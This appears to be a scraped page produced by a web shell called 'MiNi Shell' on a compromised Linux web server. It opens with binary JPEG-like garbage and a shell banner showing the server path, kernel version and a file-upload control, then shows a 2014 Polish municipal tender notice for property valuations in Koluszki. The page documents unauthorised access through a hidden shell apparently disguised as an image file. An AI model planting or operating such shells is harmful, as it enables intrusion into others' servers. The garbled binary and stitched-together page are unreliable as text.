JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140526/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140526/112181-N-2014.html

<p class="kh_header"><b>Koluszki: Wykonywanie wycen nieruchomości na potrzeby Gminy Koluszki</b><br>
<b>Numer ogłoszenia: 112181 - 2014; data zamieszczenia: 26.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Koluszkach , ul. 11-go Listopada 65, 95-040 Koluszki, woj. łódzkie, tel. 044 7256700, faks 044 7145840.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koluszki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie wycen nieruchomości na potrzeby Gminy Koluszki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie następujących wycen nieruchomości oraz opinii o braku wzrostu wartości nieruchomości:
1) 300 działek niezabudowanych położonych  na  terenie  Gminy Koluszki. 
Działki  te  będą wyceniane w celu: nabycia,  sprzedaży, zamiany oraz komunalizacji.
2) 150 działek zabudowanych,  które będą  stanowiły  własność  Gminy Koluszki  lub  własność  osób fizycznych  w  celu: sprzedaży, nabycia, zamiany  lub  ustalenia opłat  z  tytułu  trwałego  zarządu,
3) 150  działek  zabudowanych  lub  niezabudowanych  oddanych  w  wieczyste użytkowanie w  celu  wykupu  na  własność prawa wieczystego użytkowania gruntu lub przekształcenia  prawa użytkowania  wieczystego na  własność,
4) 100 lokali  mieszkalnych stanowiących własność Gminy Koluszki.
Lokale będą wyceniane na  potrzeby  sprzedaży na  rzecz głównych  najemców lub 
w drodze przetargu.
5) 80 działek  gruntu  położonych  na  terenie  Gminy Koluszki  wycenianych w celu  aktualizacji opłat  rocznych z tytułu użytkowania wieczystego.
6) 8  działek  niezabudowanych  lub  zabudowanych  położonych  na  terenie  Gminy  Koluszki  wycenianych  w  celu  naliczenia  renty  planistycznej, 
7) 180 działek  zabudowanych lub  niezabudowanych  położonych  na  terenie  Gminy  Koluszki  wycenianych  w  celu  naliczania  opłaty  adiacenckiej  z tytułu  podziału  nieruchomości,  lub  wzrostu wartości na skutek wybudowania  urządzeń  infrastruktury  technicznej.
8) 8 opinii o braku  wzrostu wartości nieruchomości. Opinia  będzie  wystawiona  
w  przypadku konieczności  potwierdzenia  przez Rzeczoznawcę  Majątkowego  braku wzrostu wartości nieruchomości.  W przypadku, gdy  opinia  będzie dotyczyła grupy  działek położonych przy jednej ulicy, lub grupy działek przylegających do siebie Zamawiający zastrzega sobie, że wystawiona opinia powinna obejmować grupę  tych działek. 
9) 70 sztuk  operatów szacunkowych określających wartość służebności  przesyłu  urządzeń  infrastruktury  technicznej  oraz  wartości odszkodowania  za szkody  powstałe w wyniku  budowy  i  przebudowy  tych sieci  lub  urządzeń.
Uwaga: Zamawiający  zastrzega sobie, że ilość  wycenianych  działek  może ulec zmniejszeniu. Uzależnione  to będzie od: 
a)  złożonych  wniosków przez użytkowników  wieczystych  zainteresowanych wykupem  na  własność.
b) bieżących  potrzeb  zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek  za  spełniony  na podstawie  podpisanych  oświadczeń o  spełnieniu  warunków  udziału w  postępowaniu, o których mowa  
w  art. 22 ust. 1 i braku  podstaw do wykluczenia  w oparciu o  art. 24 ust.1 pkt. 2   Ustawy Prawo Zamówień  Publicznych, oraz  gdy Wykonawca załączy aktualny  odpis z właściwego  rejestru lub  Centralnej  Ewidencji  i  Informacji  o Działalności Gospodarczej Rzeczpospolitej Polskiej, jeżeli odrębne przepisy wymagają  wpisu  do  rejestru lub ewidencji   wystawionego nie wcześniej niż 6 miesięcy przed upływem  terminu składania ofert.
Ocena spełnienia warunków będzie dokonywana na  podstawie złożonych dokumentów i  oświadczeń na  zasadzie: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten  warunek  za  spełniony  na podstawie podpisanego  oświadczenia  o spełnieniu warunków  udziału  w  postępowaniu, o  których mowa  
w  art. 22 ust. 1 Ustawy  Prawo Zamówień  Publicznych.
Ocena  spełnienia warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń na  zasadzie:  spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten  warunek  za  spełniony  na  podstawie  podpisanego  oświadczenia  o  spełnieniu  warunków  udziału  w  postępowaniu, o których mowa  
w art. 22 ust. 1 Ustawy  Prawo Zamówień  Publicznych.
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń na  zasadzie:  spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna   ten  warunek  za  spełniony  na  podstawie  podpisanego  oświadczenia  o  spełnieniu  warunków  udziału  w  postępowaniu,  o  których mowa  
w  art. 22 ust. 1 Ustawy  Prawo Zamówień  Publicznych, oraz  gdy  Wykonawca  dysponuje lub będzie dysponował  minimum jedną osobą, która  posiada aktualne  uprawnienia rzeczoznawcy majątkowego.
Ocena  spełnienia  warunków  będzie dokonywana na podstawie złożonych dokumentów i oświadczeń na  zasadzie: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  ten  warunek za spełniony na podstawie podpisanego  oświadczenia  o  spełnieniu  warunków  udziału  w  postępowaniu, o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych.
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń na  zasadzie:  spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony formularz oferty (załącznik nr 1 do S.I.W.Z.)  
2) Wypełniony formularz  cen  jednostkowych ( załącznik nr 2  do S.I.W.Z.).
rzeczoznawcy majątkowego (załącznik  nr 6 do  specyfikacji).
3) W  przypadku, gdy Wykonawca będzie korzystał z wiedzy i doświadczenia, potencjału technicznego, osób zdolnych do wykonania zamówienia innych podmiotów, zobowiązany jest przedstawić pisemne zobowiązanie tych podmiotów do oddania mu  do dyspozycji niezbędnych zasobów na  okres korzystania z nich  przy wykonywaniu zamówienia.
4) W przypadku, gdy podmioty występują wspólnie Wykonawcy powinni  ustanowić  pełnomocnika do  reprezentowania ich w postępowaniu o udzielenie zamówienia,  albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia  publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zamawiający dopuszcza  zmianę postanowień  zawartej  umowy  w  stosunku do treści  oferty  na podstawie  której  dokonano  wyboru  Wykonawcy  w następujących przypadkach:
a) w uzasadnionych przypadkach, a w szczególności, gdy: zajdzie konieczność wykonania skomplikowanego operatu szacunkowego, ilość zleconych wycen będzie  większa niż 10 operatów szacunkowych lub w innych  okolicznościach  niezależnych  od  Zamawiającego lub  Wykonawcy, kiedy  konieczna  będzie  zmiana  terminu  realizacji  zamówienia,  Zamawiający  na  pisemny  wniosek  Wykonawcy  może  wydłużyć termin  realizacji  tego  zamówienia,
b) w  innych  uzasadnionych  przypadkach,  gdy  zajdzie  konieczność wprowadzenia  do  umowy  koniecznych  zmian  wynikających  z okoliczności,  których nie  można  było przewidzieć  w  chwili  zawarcia  umowy a w szczególności   zmiany  rzeczoznawcy  majątkowego  sporządzającego  operaty  szacunkowe,  Zamawiający  za  zgodą  lub  na  wniosek  Wykonawcy  może  dokonać  takiej  zmiany. 
c) w  przypadku, gdy zmiany  postanowień  zawartej  umowy będą  korzystne dla Zamawiającego,  a  zmiany  te  wynikły  w  trakcie  realizacji  zamówienia, Zamawiający  za zgodą  Wykonawcy może  dokonać takiej zmiany.
d) w przypadku,  gdy  zajdzie  uzasadniona  konieczność  ograniczenia,  lub rezygnacji  z części  wycen Zamawiający zastrzega sobie, że  zapłaci  Wykonawcy  tylko za zlecone  i sporządzone operaty szacunkowe. 
e) w przypadku  ustawowej  zmiany  stawki  podatku  od  towarów i  usług ( VAT) cena netto pozostanie bez  zmian, a kwota  podatku VAT i wartość brutto zostanie  odpowiednio  skorygowana  zgodnie  z  aktualnie  obowiązującymi przepisami  podatkowymi.
f) zmiany  podmiotu trzeciego  (podwykonawcy  na  etapie realizacji zamówienia),
a  nowy  podwykonawca  wykaże  spełnianie warunków  w zakresie nie  mniejszym niż wskazany  na  etapie postępowania o  zamówienie publiczne  dotychczasowy podwykonawca</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koluszki.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Koluszkach przy ul. 11 Listopada 65 pok. 203.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2014 godzina 10:30, miejsce: kancelaria Urzędu Miejskiego w Koluszkach, 95-040 Koluszki ul. 11 Listopada 65.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com